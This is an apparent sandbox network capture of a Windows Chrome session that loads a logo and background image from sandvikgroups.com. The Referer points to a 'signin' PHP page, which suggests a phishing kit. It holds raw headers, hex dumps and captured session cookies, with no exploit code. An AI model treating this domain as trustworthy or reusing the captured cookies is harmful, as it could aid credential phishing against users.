                                        Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.sandvikgroups.com; Priority=High; HttpOnly; Secure; SameSite=None
                                        Set-Cookie: cf_clearance=oHaYq7IYfWosN2nPRP.pTTLKRJAyLtN5uUZoaoiYTr4-1736283985-1.2.1.1-piz0OktFvZeLf62uywSuP3J_vhzBVwT.YudtWxBnV4hYfeskOjoMglPFCbtHf7OhboKa1K3k0QFxI4uW9abcSGgsy1VpFVpnigknqhPgfHD3mjvFO7rnx6ma530ul_r8uq.rhDCTP00hMzrqf5otLX1rvn1.8h4yffmMbPGGOaBXWvHbL_478ccyhofeYvax3EYXHDRhau3nWkI2ORvM.OM3tqbBS5Lk9Lb9zq0j6ExTorRW7WQY04gC9mzYFBTqeoLGs8CA4_mixlNlggc9n.o9SgJNZyeRTByaBc8oIU5_JGfgzAJy1cMQ.cWA_MMHu7YDH82JTqYV1Ol_MfveeGekCDuIrfofE9n2fX3etJ8PmGkDhIrDR1aDNduwnji9hXgf4DqQd992NvHKFQ0AVjEZwrWFJwqSjO6TxE_KqhXE0TU76ponUdkS2FU7MAdk; Path=/; Expires=Wed, 07-Jan-26 21:06:25 GMT; Domain=.sandvikgroups.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdrEcJTwYPnzFlO3eDSQ4V3eezvoPFcF0JfxJRjvq2YeGh12fT2oLT95Trvn%2FP9CIGfMVJUIvRAZUGAqCDID2E8GqFxOivjhrPJY323G%2Bi8ZAP2exx88rCO79KuC2uqlKAVo1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e95bae7d42ab-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:25 UTC219INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 31 35 26 6d 69 6e 5f 72 74 74 3d 31 37 30 37 26 72 74 74 5f 76 61 72 3d 36 35 36 26 73 65 6e 74 3d 31 30 26 72 65 63 76 3d 32 31 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 34 33 26 72 65 63 76 5f 62 79 74 65 73 3d 31 38 30 33 38 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 36 34 37 38 35 35 26 63 77 6e 64 3d 32 30 34 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 37 38 32 31 39 36 31 62 31 64 33 30 63 38 38 66 26 74 73 3d 32 32 30 26 78 3d 30 22 0d 0a 0d 0a
                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1707&rtt_var=656&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2843&recv_bytes=18038&delivery_rate=1647855&cwnd=204&unsent_bytes=0&cid=7821961b1d30c88f&ts=220&x=0"


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        46192.168.2.449818188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:25 UTC1919OUTGET /?get_link=ch_files/pics/white_logo.svg HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://sandvikgroups.com/?get_link=ch_files/ca/csspage2.php?page=signin&t=qrd0fg2hx9ez7rr
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:25 UTC1272INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:25 GMT
                                        Content-Type: image/svg+xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        X-Content-Type-Options: nosniff
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        X-XSS-Protection: 1; mode=block
                                        Cache-Control: max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, public, immutable
                                        Cache-Control: max-age=0, private, no-cache, no-store, must-revalidate
                                        Pragma: public
                                        Pragma: no-cache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        X-Nginx-Upstream-Cache-Status: BYPASS
                                        X-Server-Powered-By: Engintron
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pib2PTcmyp1znoNLnWaya7avx5zAcqzeZoM%2BLwbFM9GASz%2FBW6skyrEgPA1G1vXtR7ROKWNLI2DbuUf85i%2BkJJlUJ%2BDZXrstovj4ahXWkoj%2Fdaf4GqQIEjhPgoDmSSmxyfyZ2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e95c0ec6436a-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1643&rtt_var=650&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2541&delivery_rate=1777236&cwnd=184&unsent_bytes=0&cid=f4de86e9f5c1ba6b&ts=554&x=0"
                                        2025-01-07 21:06:25 UTC97INData Raw: 35 38 31 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 38 30 20 37 32 2e 32 22 3e 0a 09 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 64 3d 22 4d 33
                                        Data Ascii: 581<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 380 72.2"><path fill="#FFFFFF" d="M3
                                        2025-01-07 21:06:25 UTC1319INData Raw: 35 36 2e 31 2c 31 6c 2d 32 32 2e 35 2c 30 63 2d 31 2e 34 2c 30 2d 32 2e 35 2c 31 2e 31 2d 32 2e 35 2c 32 2e 35 76 31 37 2e 34 48 33 37 37 4c 33 35 36 2e 31 2c 31 7a 22 2f 3e 0a 09 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 64 3d 22 4d 33 37 36 2e 32 2c 32 33 2e 36 68 2d 31 37 2e 34 76 34 35 2e 39 6c 31 39 2e 38 2d 32 30 2e 39 6c 30 2d 32 32 2e 35 43 33 37 38 2e 37 2c 32 34 2e 37 2c 33 37 37 2e 36 2c 32 33 2e 36 2c 33 37 36 2e 32 2c 32 33 2e 36 7a 22 2f 3e 0a 09 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 64 3d 22 4d 33 33 31 2e 31 2c 37 31 2e 32 68 32 32 2e 35 63 31 2e 34 2c 30 2c 32 2e 35 2d 31 2e 31 2c 32 2e 35 2d 32 2e 35 56 35 31 2e 33 68 2d 34 35 2e 39 4c 33 33 31 2e 31 2c 37 31 2e 32 7a 22 2f 3e 0a 09 09
                                        Data Ascii: 56.1,1l-22.5,0c-1.4,0-2.5,1.1-2.5,2.5v17.4H377L356.1,1z"/><path fill="#FFFFFF" d="M376.2,23.6h-17.4v45.9l19.8-20.9l0-22.5C378.7,24.7,377.6,23.6,376.2,23.6z"/><path fill="#FFFFFF" d="M331.1,71.2h22.5c1.4,0,2.5-1.1,2.5-2.5V51.3h-45.9L331.1,71.2z"/>
                                        2025-01-07 21:06:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        47192.168.2.449819188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:25 UTC1916OUTGET /?get_link=ch_files/pics/1024_bg.jpg HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://sandvikgroups.com/?get_link=ch_files/ca/csspage2.php?page=signin&t=qrd0fg2hx9ez7rr
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:26 UTC1247INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:26 GMT
                                        Content-Type: image/jpeg
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Content-Type-Options: nosniff
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        X-XSS-Protection: 1; mode=block
                                        Cache-Control: max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, public, immutable
                                        Cache-Control: max-age=0, private, no-cache, no-store, must-revalidate
                                        Pragma: public
                                        Pragma: no-cache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        X-Nginx-Upstream-Cache-Status: BYPASS
                                        X-Server-Powered-By: Engintron
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGWPBdcwbPppeSNS6mDXtJcUVwX7qOWGtSuXCb2lHHzhlWisZceZocRp%2FYopXOMAUkRpdo%2BpB%2Bw9F28MnIeGzd8bnJbYRI4p1bN7T7mhBl9e%2Bik%2BZNLbKtlSG8HKYFEZGvVhfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e95ccde518ea-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1647&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2538&delivery_rate=1706604&cwnd=244&unsent_bytes=0&cid=a841b258db6bfc94&ts=1050&x=0"
                                        2025-01-07 21:06:26 UTC122INData Raw: 33 35 34 36 0d 0a ff d8 ff e1 19 2b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 90 87 69 00 04 00 00 00 01 00 00 00 a4 00 00 00 d0 00 0a fc 80 00 00
                                        Data Ascii: 3546+ExifMM*bj(1r2i
                                        2025-01-07 21:06:26 UTC1369INData Raw: 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 31 39 3a 30 36 3a 30 32 20 32 30 3a 35 31 3a 33 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 1e 01 1b 00 05 00 00 00 01 00 00 01 26 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 2e 02 02 00 04 00 00 00 01 00 00 17 f5 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff ed 00 0c 41 64 6f 62 65 5f 43 4d 00 02 ff ee 00 0e 41 64 6f 62 65 00 64 80 00 00 00 01 ff db 00 84 00 0c 08 08 08 09 08 0c 09 09 0c 11 0b 0a 0b 11 15 0f 0c 0c 0f
                                        Data Ascii: ''Adobe Photoshop CS6 (Windows)2019:06:02 20:51:388&(.HHAdobe_CMAdobed
                                        2025-01-07 21:06:26 UTC1369INData Raw: 00 47 d2 0d 7f e9 fe 9f f8 46 7e 62 87 d9 a3 a9 a2 35 07 b8 67 f7 cd 68 2c 1f 4c 81 e8 7c 1a 18 56 67 59 90 ee 8f 88 f3 85 4d af 17 e3 d6 5a db 2e 66 25 bb ae bb f4 cd 7b aa a3 d1 63 7f 47 46 cf 5f d5 c8 f4 d6 dd 18 99 54 bc 4e 63 ef a8 68 59 75 6c dd a7 1b 2e a7 d2 db fd b6 58 b1 fa 27 d5 b6 5e c1 d4 72 71 eb c6 c6 cb 21 f4 e3 b7 d4 36 d6 c0 3f 47 6e 3e 4f a8 d7 54 fb 1f ef fd 2f ad fa 35 d2 d3 41 65 4d a4 3a cb b6 70 fb 5d be c2 3f 95 64 0d df da 52 c0 9e bf 9b 04 c0 3b 6f e4 8c 35 48 31 14 57 e2 35 0a 41 89 fc 4b 29 09 68 1f 48 69 e7 ae bd 96 77 54 a7 37 2a 59 43 fd 3c 46 b5 8d 2f 0c 73 9e eb 9d 63 6b 70 15 b0 b5 ef a6 ba 1d b9 ff 00 e0 bd 45 b0 19 e4 9f d3 04 01 c4 71 1d a3 c1 02 6d 70 d1 a1 6e 3e 4e 2e 23 9b 8d 79 0d ac 00 25 95 0d ac 1f 4d cd 7b 83
                                        Data Ascii: GF~b5gh,L|VgYMZ.f%{cGF_TNchYul.X'^rq!6?Gn>OT/5AeM:p]?dR;o5H1W5AK)hHiwT7*YC<F/sckpEqmpn>N.#y%M{
                                        2025-01-07 21:06:26 UTC1369INData Raw: 3a c7 03 bc fd 99 ec 6b 77 39 bb bd df e1 19 f9 e8 f4 7d 5f b7 2a 97 3a a7 90 c7 48 6b ad d6 5c 3f 9c 0f a9 ed 7b 5d bd e7 d9 6b 14 66 1d 03 20 98 1a df e0 d6 e8 d9 98 04 be 8c ed 98 b6 09 73 6c 68 73 03 40 3b ff 00 c1 fd 06 ff 00 5b f9 ad ff 00 a1 b3 fc 1a eb 03 24 03 c8 20 10 7c 41 12 0a e5 eb c2 7e 25 d7 e3 bf 11 bd 4b 1a 87 7d 27 18 75 72 03 b6 fe 8d 96 39 cd 6b 9d b7 f4 35 fa 9e a7 f3 6b aa c3 63 86 35 6d 35 ba 9d 83 68 ad e4 b8 80 34 6f b9 f2 fd bf d7 4f c5 39 44 88 91 a7 75 99 61 19 44 cb 88 71 0e 9d d7 0c 9e 54 85 68 c2 b5 36 b1 4f c6 d6 e1 44 c6 41 9d 11 7d c3 50 48 3e 42 3f 22 98 62 90 62 69 20 9b 5e 2c 0a d5 08 ad 3f a6 51 c3 13 fa 68 f1 2b 85 07 a6 9f d3 47 15 a7 d8 87 1a 78 1a fe 9a 46 99 20 87 39 ae 02 01 69 f1 fe 4b b7 31 ca c6 c4 88 63 41
                                        Data Ascii: :kw9}_*:Hk\?{]kf slhs@;[$ |A~%K}'ur9k5kc5m5h4oO9DuaDqTh6ODA}PH>B?"bbi ^,?Qh+GxF 9iK1cA
                                        2025-01-07 21:06:26 UTC1369INData Raw: ec f5 1c 2c 7b 0f a5 65 4f 63 61 df ab fa 4d 73 7d 37 54 d7 57 b3 1f ff 00 3e a6 93 2f 04 81 17 d4 36 a7 da 17 07 57 d7 ce a9 f6 87 5b 66 31 7b 03 bd 36 b1 a0 b6 81 b8 89 7e 47 e7 b1 f5 37 e8 7b bf 9c f5 16 ef 4d fa d9 7f 52 ca af 1f 1b a5 5a dd ee 25 d6 59 63 58 1b 53 7e 96 47 d1 7f b7 f7 3f 7d 30 cc 8d f4 64 10 05 ff d3 f3 fc 8e a7 7b 8e c0 c6 81 11 a4 83 03 f7 bf aa ae 74 8a e8 cf 75 d5 5c f7 54 e6 01 e9 bd 87 42 7e 8f e9 1b af d1 73 ab 58 ed 32 e2 e3 a8 22 74 f0 06 02 b7 d2 fa 88 e9 ef b2 d6 d6 2d 73 b4 6c c0 02 7e 94 6e 0e fa 4a 39 83 c2 78 34 97 46 58 48 19 8f 70 dc 7a db d0 d5 d3 31 bd 18 73 dc 0d 95 99 7c cb b7 eb e9 bb 73 dd b7 fe 2d 89 5b 8b d4 ab 68 c4 7d c7 33 12 b8 7b b1 ad 71 6b 74 fa 0c a3 6e f6 fb 23 d4 7b da b1 2d fa c7 d4 8b 1e ca 8d 74
                                        Data Ascii: ,{eOcaMs}7TW>/6W[f1{6~G7{MRZ%YcXS~G?}0d{tu\TB~sX2"t-sl~nJ9x4FXHpz1s|s-[h}3{qktn#{-t
                                        2025-01-07 21:06:26 UTC1369INData Raw: 43 2d 77 a5 f6 76 7b ea bb 66 ae b3 d6 fb 4f be aa ff 00 d3 53 65 2b 0f 1b 3f 37 13 3d b7 8b 5d 4d 81 e3 6b 77 7b 03 9a 3e cf 55 d6 b3 dc c7 6e 6f ea d7 fa 9f a4 ff 00 0b fe 91 3b 6c be 8c bb 32 83 7e c9 91 75 76 56 e3 46 d0 c6 b8 11 ea bb 2d 8e df 5d f5 d9 ea 33 7b 5b 4f a7 fc dd 94 a4 71 48 d8 3f cb c1 02 71 14 6c ff 00 2e af ff d4 f3 0b 1c d2 ef 63 76 b3 b3 66 74 49 80 3c 9d dc 00 4c 9e d0 a0 a7 5f d3 67 d1 fa 5f 9f f4 3f b6 82 ed 3a b3 c7 c7 c8 ca 79 66 3d 4f b5 f1 f4 6b 69 71 1f 1d ab 47 1b a1 5c 5e d6 e4 b9 b8 ac 75 9b 3d ed 2f 79 26 1b ec aa b9 dc dd df 9e ba be 9f fd 12 bf e6 b9 ff 00 b4 9f cd 71 ff 00 57 fb 8b 3f 2b fe d5 7f 4a e2 bf e6 7e 9f fe 82 7f dd 7f f4 9f f0 8a 19 fb da d0 00 78 1b 97 fc ef 4b 3e 3f bb e9 66 44 ff 00 58 70 c3 fe 6f 14 9c
                                        Data Ascii: C-wv{fOSe+?7=]Mkw{>Uno;l2~uvVF-]3{[OqH?ql.cvftI<L_g_?:yf=OkiqG\^u=/y&qW?+J~xK>?fDXpo
                                        2025-01-07 21:06:26 UTC1369INData Raw: 62 40 6f e0 00 00 00 00 00 00 00 00 00 42 6c 20 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 42 72 64 54 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 42 6c 64 20 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 52 73 6c 74 55 6e 74 46 23 50 78 6c 40 52 00 00 00 00 00 00 00 00 00 0a 76 65 63 74 6f 72 44 61 74 61 62 6f 6f 6c 01 00 00 00 00 50 67 50 73 65 6e 75 6d 00 00 00 00 50 67 50 73 00 00 00 00 50 67 50 43 00 00 00 00 4c 65 66 74 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 54 6f 70 20 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 53 63 6c 20 55 6e 74 46 23 50 72 63 40 59 00 00 00 00 00 00 00 00 00 10 63 72 6f 70 57 68 65 6e 50 72 69 6e 74 69 6e 67 62 6f 6f 6c 00 00 00 00 0e 63 72 6f 70 52 65
                                        Data Ascii: b@oBl doub@oBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@RvectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRe
                                        2025-01-07 21:06:26 UTC1369INData Raw: 53 6c 69 63 65 48 6f 72 7a 41 6c 69 67 6e 00 00 00 07 64 65 66 61 75 6c 74 00 00 00 09 76 65 72 74 41 6c 69 67 6e 65 6e 75 6d 00 00 00 0f 45 53 6c 69 63 65 56 65 72 74 41 6c 69 67 6e 00 00 00 07 64 65 66 61 75 6c 74 00 00 00 0b 62 67 43 6f 6c 6f 72 54 79 70 65 65 6e 75 6d 00 00 00 11 45 53 6c 69 63 65 42 47 43 6f 6c 6f 72 54 79 70 65 00 00 00 00 4e 6f 6e 65 00 00 00 09 74 6f 70 4f 75 74 73 65 74 6c 6f 6e 67 00 00 00 00 00 00 00 0a 6c 65 66 74 4f 75 74 73 65 74 6c 6f 6e 67 00 00 00 00 00 00 00 0c 62 6f 74 74 6f 6d 4f 75 74 73 65 74 6c 6f 6e 67 00 00 00 00 00 00 00 0b 72 69 67 68 74 4f 75 74 73 65 74 6c 6f 6e 67 00 00 00 00 00 38 42 49 4d 04 28 00 00 00 00 00 0c 00 00 00 02 3f f0 00 00 00 00 00 00 38 42 49 4d 04 11 00 00 00 00 00 01 01 00 38 42 49 4d 04 14
                                        Data Ascii: SliceHorzAligndefaultvertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNonetopOutsetlongleftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?8BIM8BIM
                                        2025-01-07 21:06:26 UTC1369INData Raw: c2 fa d1 d7 69 9a b3 ba 7f da 4e 39 d9 90 ec 68 16 0d bf 9c fc 76 ef 67 fd 76 b6 d7 53 d6 d1 fa cb f5 6b 23 1a d7 8c da 98 18 d2 4d 76 b4 8b 23 f3 d8 2a b9 9f a4 7f f2 18 a8 75 7c 0c 9b b6 75 0c 09 6f 52 c4 83 59 6f 36 d6 df a5 8c ff 00 de f6 ff 00 35 ff 00 6c a1 5b d5 ba 0e 67 4d 76 76 50 c7 bc b1 92 fc 7b 76 fa a1 ff 00 47 d2 0d 7f e9 fe 9f f8 46 7e 62 87 d9 a3 a9 a2 35 07 b8 67 f7 cd 68 2c 1f 4c 81 e8 7c 1a 18 56 67 59 90 ee 8f 88 f3 85 4d af 17 e3 d6 5a db 2e 66 25 bb ae bb f4 cd 7b aa a3 d1 63 7f 47 46 cf 5f d5 c8 f4 d6 dd 18 99 54 bc 4e 63 ef a8 68 59 75 6c dd a7 1b 2e a7 d2 db fd b6 58 b1 fa 27 d5 b6 5e c1 d4 72 71 eb c6 c6 cb 21 f4 e3 b7 d4 36 d6 c0 3f 47 6e 3e 4f a8 d7 54 fb 1f ef fd 2f ad fa 35 d2 d3 41 65 4d a4 3a cb b6 70 fb 5d be c2 3f 95 64
                                        Data Ascii: iN9hvgvSk#Mv#*u|uoRYo65l[gMvvP{vGF~b5gh,L|VgYMZ.f%{cGF_TNchYul.X'^rq!6?Gn>OT/5AeM:p]?d
                                        2025-01-07 21:06:26 UTC1369INData Raw: f6 36 ef 46 86 b3 df 91 ff 00 81 a1 e5 1e 8f 53 9b 4d 2f a8 49 93 63 03 4b 5a 47 b5 c6 c7 37 6b 76 d7 fc 8f 51 03 18 90 91 32 0d 57 83 c9 7a 5b 80 71 68 73 49 d8 59 0e 3a 9d 58 fd cd 73 5a fd df 4d 5c aa d1 4d a0 bb 0d 85 ed 32 59 61 71 61 00 8f a4 c1 e9 b9 de e6 ef fe 77 de b5 9f 57 4f c8 71 7e 26 46 eb 47 d0 6b 58 f6 3a c7 03 bc fd 99 ec 6b 77 39 bb bd df e1 19 f9 e8 f4 7d 5f b7 2a 97 3a a7 90 c7 48 6b ad d6 5c 3f 9c 0f a9 ed 7b 5d bd e7 d9 6b 14 66 1d 03 20 98 1a df e0 d6 e8 d9 98 04 be 8c ed 98 b6 09 73 6c 68 73 03 40 3b ff 00 c1 fd 06 ff 00 5b f9 ad ff 00 a1 b3 fc 1a eb 03 24 03 c8 20 10 7c 41 12 0a e5 eb c2 7e 25 d7 e3 bf 11 bd 4b 1a 87 7d 27 18 75 72 03 b6 fe 8d 96 39 cd 6b 9d b7 f4 35 fa 9e a7 f3 6b aa c3 63 86 35 6d 35 ba 9d 83 68 ad e4 b8 80 34
                                        Data Ascii: 6FSM/IcKZG7kvQ2Wz[qhsIY:XsZM\M2YaqawWOq~&FGkX:kw9}_*:Hk\?{]kf slhs@;[$ |A~%K}'ur9k5kc5m5h4


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        48192.168.2.449820188.114.97.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:25 UTC834OUTGET /cdn-cgi/challenge-platform/h/g/jsd/r/8fe6e9464fad422f HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
